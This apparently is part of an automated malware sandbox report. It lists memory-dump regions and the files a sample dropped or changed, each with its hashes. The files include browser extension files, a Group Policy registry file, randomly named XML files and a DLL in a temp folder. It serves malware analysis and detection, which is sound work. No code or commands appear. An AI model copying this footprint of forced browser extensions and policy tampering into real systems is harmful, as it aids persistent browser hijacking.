memory/4480-89-0x00000296AFD10000-0x00000296AFD32000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c14b4027612bc378d18323c6cb595254
SHA1 be44b1b6918e7d908876a65d8737bd5964912726
SHA256 0d54e2a73a8738ce3ce39c7baacf73045ae8909ef3eec1a8e723c447d4b57ad3
SHA512 f8da0a441cb3c6a3c6fe0e4fbd9830b8a571c924c0d29cdbfc2df6431c8137e52df2470fc13a9b4686e27ef1e44ed1bae00da2faccc372028a201d33e6f6019f

memory/4480-93-0x00007FFD46270000-0x00007FFD46D32000-memory.dmp

memory/2796-94-0x0000000000470000-0x0000000000B2E000-memory.dmp

memory/4252-99-0x0000000000DC0000-0x000000000147E000-memory.dmp

memory/2796-100-0x0000000000470000-0x0000000000B2E000-memory.dmp

memory/4252-101-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/916-113-0x0000000073300000-0x0000000073AB1000-memory.dmp

memory/4252-112-0x0000000003170000-0x00000000031F5000-memory.dmp

memory/916-116-0x0000000003C00000-0x0000000003C10000-memory.dmp

memory/916-114-0x0000000003C00000-0x0000000003C10000-memory.dmp

memory/916-129-0x00000000049C0000-0x0000000004D17000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 26f48603da8d593e816a6ccb40d9ab23
SHA1 b61f4dd069904b81fd43e62c2be93424d56f40da
SHA256 e689d040c3a92d071ab663ac4e120e6b1c043e19901947e3fe5164a60e4d5d96
SHA512 d07161d177422039709764de640cb8183adbe3e5bbc425fcae5afb6a8ceac53f511302383610843f6f1080a30cd4ccd6225d99099acd1ee7ee186be8302823e9

memory/916-149-0x00000000054C0000-0x000000000550C000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 34a0c29ffd77149b3bb23c76eac7750d
SHA1 725a5567f6428fe2195e717bab79a7aeafd2e298
SHA256 a03ed141b2d2c75f169f8c98be1aad625102a8e3e47945e810e4bba154ed21a0
SHA512 f1d127c53e14c9b79cf77b809a3b0087c783c7d9313ca71b432645b2fd7534c4f507a064ca992bef003c7a7fec60307d6ab7e40e1bd2abaad8907a08440cb82c

memory/916-161-0x0000000073300000-0x0000000073AB1000-memory.dmp

memory/916-160-0x0000000003C00000-0x0000000003C10000-memory.dmp

memory/4252-173-0x00000000037F0000-0x0000000003854000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 e648803b818a94993a9b7b9d71cc3fd8
SHA1 4da1ed3e5f6db90f87ec351728b6cce904baf5f0
SHA256 370ebf48ee6f11de009f8d7681a6954856bc8cd8d0f4d4d8415215eda2335b84
SHA512 d7da67de2b93fba4988c5ee043603a9fc82930b18fdfb89e4942fd092ddc0eb33f96eb0497db5f3e1909b2bb3cf7e8d6402e185a0f3293df0cdf2501fad9ba58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\orRvbnhdU\QFRhpCj.xml

MD5 f5ab1bf1d69af3e5b6551e7b0520f057
SHA1 b167f11122aee00f37441414831740409432e843
SHA256 ecd5f8eee3030c92c6b2ce58b19eb458dc4070a51440bbad858aaaf48e8e1ac8
SHA512 d8e7aae92ff9fc9ccdf20d3629dd2e87ee5d3921deb2b34b503e9d241d17f35392d6c5c267acedee827baece4350805cbba767b791b2171032d549eead6c0d92

C:\Program Files (x86)\YrliKKkuhgWU2\OlrFUJF.xml

MD5 9c3ab67a5c2dabf9c5454c3ab30bd5bd
SHA1 39efce22c7e26bbf643b2ee8bf9bd1da9fff58fb
SHA256 c2e7a37ce2ed9e94a8e201ba1c84b4fd56eab1d8f9a0b949bd94bf5cc8c78a2d
SHA512 bb7f515b4063af1c98470a1054c2e65b8a1c22a518676520059f1fe00ea9fe9a32c8a5c64cdc324ad94cdf7aeff86be42fff58b516be66daba28e25b7c2286df

C:\ProgramData\qgjSpVnHOWlNdqVB\SieaGYe.xml

MD5 173f5868755907d0eb191bff13f7d82d
SHA1 2536d876a4abb7dbc7af29cdb9a565629e667f87
SHA256 83ba0b82b631f91fa4e7aefc054caec5d2c49e053a92c38695397d40a1ab0198
SHA512 df53bf4761c48b7ad555cb17ffd65dd9cbf65e50fb0d54311c33075d875d54a0a085e90fcb5619fab8595d10cd575f20fef0cf4235d273120e916889ec1528f1

C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\gdbQUZn.xml

MD5 e44c9587490d4d873c52fc95cc433831
SHA1 d6a4dd361c344d03876d4433ecfc385720164e7f
SHA256 147e76478215c557505f38849b39b0dee60610ad4ce9522dc8f6ee897bbb340a
SHA512 49b2055d5caeab8de86803aa1ab18b9c67570dc9bed97708ea21dab0d1d1b3bb475c5bb4033e32715c125dab2e832b10b72701593c78031a1ed17ab91428cee2

C:\Program Files (x86)\ycfBUKIjHxeOC\TxsIYCe.xml

MD5 d60deb75c4993c72f02c3c88258dad92
SHA1 8abc3e369608ebbb8a70b4f8001b104a09fea440
SHA256 7814437c074b9210812f38248eb30a00117596cb3ace5a1ad29f3dacd49f1df8
SHA512 1d245d836c83463443e1da7dcb1dd87f8dc5e184dc2fb80295ac3a19fe2ba0611bad403bff8757b4e6980c1a3f12da3e98016bda71d7970c708aa61dcf409777

memory/4252-488-0x0000000000DC0000-0x000000000147E000-memory.dmp

memory/4252-492-0x0000000003FD0000-0x0000000004053000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vkmkrhdv.default-release\prefs.js

MD5 a80e66cd2617779e76a04cd840ae043e
SHA1 21eec21df619de67b767d03b242472e68b9b9b86
SHA256 60d90c517ca6fd5331b687cdacc8bf78a4a4feed60ecfd47038062ad8e410f0f
SHA512 a70755223c4b8e7229032fb9f699be53e462720cf1878b52dfe8c620552fa0635abf8f76558839b198dc70696dbbfd97b028860f365b2a9739c4dfcf9e8449f4

memory/4252-506-0x0000000004060000-0x000000000412F000-memory.dmp

C:\Windows\Temp\lwSRcZKonRlOofsg\QRdCFhVy\GBDWZzT.dll

MD5 db0e0228f220bd8fa3b45a0043744456
SHA1 e287442ab5c21cab796c6893a34f0474820b6515
SHA256 9d17deafa6484b95a25345472c61bfbf7c510b4fafd2a52e7806db27ec4a6883
SHA512 a6d1aa8dc12f47ca1b9781264f02a4058287eb3bca0033ec9c3d3bd4adc9e3ac87c6bfcb361dc90ea40c056e0a9f29a28c7454afef5233a11c13c5c40d35f763

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1cc9e59a27d7b2afd4bc1e1f5e637179
SHA1 4b9a3f588a8def95e837ac2db7c0e453d81cb9dc
SHA256 fbccda5a2da5613a2bc730011ac67822f76f17f6823b0cc0ab5f6e43b9850cda
SHA512 9654f61f4934f36f1595acebe0214e972c958c19b047433f7c6f7b32f64e86d7280a9676725ab61549d628581287d88b4a9c2bf57e80f924a5b215f1f8ca898d

memory/1516-533-0x0000000001FB0000-0x0000000002583000-memory.dmp

memory/1476-567-0x0000000000900000-0x0000000000FBE000-memory.dmp

memory/4252-572-0x0000000000DC0000-0x000000000147E000-memory.dmp